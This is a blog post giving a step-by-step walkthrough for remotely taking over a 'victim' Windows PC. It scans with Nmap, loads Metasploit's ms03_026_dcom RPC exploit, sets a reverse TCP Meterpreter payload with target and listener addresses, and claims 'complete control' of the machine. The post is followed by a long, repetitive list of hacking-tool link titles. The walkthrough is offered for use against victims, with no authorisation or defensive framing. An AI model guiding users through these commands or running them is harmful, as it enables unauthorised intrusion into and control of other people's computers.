Mga Pahina

Thursday, January 25, 2024

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
Related articles

  1. Hack Tools
  2. Pentest Tools List
  3. Hacking Tools 2019
  4. Hacking Apps
  5. Termux Hacking Tools 2019
  6. Hacker Tools
  7. Pentest Tools Linux
  8. Pentest Tools List
  9. Hacking Tools 2020
  10. How To Install Pentest Tools In Ubuntu
  11. Hacking Tools Software
  12. Kik Hack Tools
  13. Hacker Tools Linux
  14. Hacking Tools Mac
  15. Pentest Automation Tools
  16. Easy Hack Tools
  17. Hacker Hardware Tools
  18. Hack Tools For Games
  19. Hack Apps
  20. Hacker Techniques Tools And Incident Handling
  21. Hacker Hardware Tools
  22. Android Hack Tools Github
  23. Pentest Tools Android
  24. Hacker Tools For Pc
  25. Hacker
  26. Hacker Tools Mac
  27. Hacking Tools For Beginners
  28. World No 1 Hacker Software
  29. Hack Tools
  30. Hacker Tools Github
  31. Hack Rom Tools
  32. Termux Hacking Tools 2019
  33. Pentest Tools Find Subdomains
  34. Best Pentesting Tools 2018
  35. Pentest Tools For Mac
  36. Hacker Tools Free Download
  37. Hacking Tools Hardware
  38. Hack Tool Apk No Root
  39. Install Pentest Tools Ubuntu
  40. Hacker
  41. Pentest Automation Tools
  42. Pentest Tools Free
  43. Pentest Tools Alternative
  44. Tools For Hacker
  45. Hacking Tools Name
  46. Hack Tools Download
  47. Pentest Tools Subdomain
  48. Pentest Tools Subdomain
  49. Pentest Tools Apk
  50. Hacking Tools Windows 10
  51. Pentest Tools Windows
  52. Physical Pentest Tools
  53. Game Hacking
  54. Pentest Tools Android
  55. Hak5 Tools
  56. Hacking Tools For Games
  57. Hacker Tools Windows
  58. Pentest Tools
  59. Hack Tools Online
  60. Hack Rom Tools
  61. Hack And Tools
  62. Pentest Tools Apk
  63. Hacking Tools Hardware
  64. Tools Used For Hacking
  65. New Hack Tools
  66. Pentest Tools Free
  67. Hack Tools Mac
  68. Bluetooth Hacking Tools Kali
  69. Pentest Box Tools Download
  70. Hacker Tools For Windows
  71. Hacking Apps
  72. Hacking Tools Github
  73. Hacker Tools For Ios
  74. Hacker Tools For Mac
  75. Ethical Hacker Tools
  76. Pentest Tools Alternative
  77. Top Pentest Tools
  78. Hacking Tools For Pc
  79. Hacking Tools Online
  80. Pentest Tools For Ubuntu
  81. Tools For Hacker
  82. Hacking Tools Pc
  83. Pentest Tools
  84. Hacker Tools Software
  85. Hacker Tools For Ios
  86. Hacking Tools For Windows
  87. Tools For Hacker
  88. Free Pentest Tools For Windows
  89. Free Pentest Tools For Windows
  90. Pentest Automation Tools
  91. Nsa Hack Tools
  92. Hacking Tools For Games
  93. Pentest Tools Bluekeep
  94. Pentest Tools List
  95. Termux Hacking Tools 2019
  96. Hacking Tools Hardware
  97. Hacking App
  98. Hacker Tools List
  99. Hack Tools For Mac
  100. Black Hat Hacker Tools
  101. Pentest Tools Github
  102. Hak5 Tools
  103. Pentest Tools Url Fuzzer
  104. Hacking Tools For Windows 7
  105. World No 1 Hacker Software
  106. Pentest Tools Online
  107. Growth Hacker Tools
  108. Pentest Tools Url Fuzzer
  109. Tools Used For Hacking
  110. Hacking Tools For Kali Linux
  111. Hacker

No comments:

Post a Comment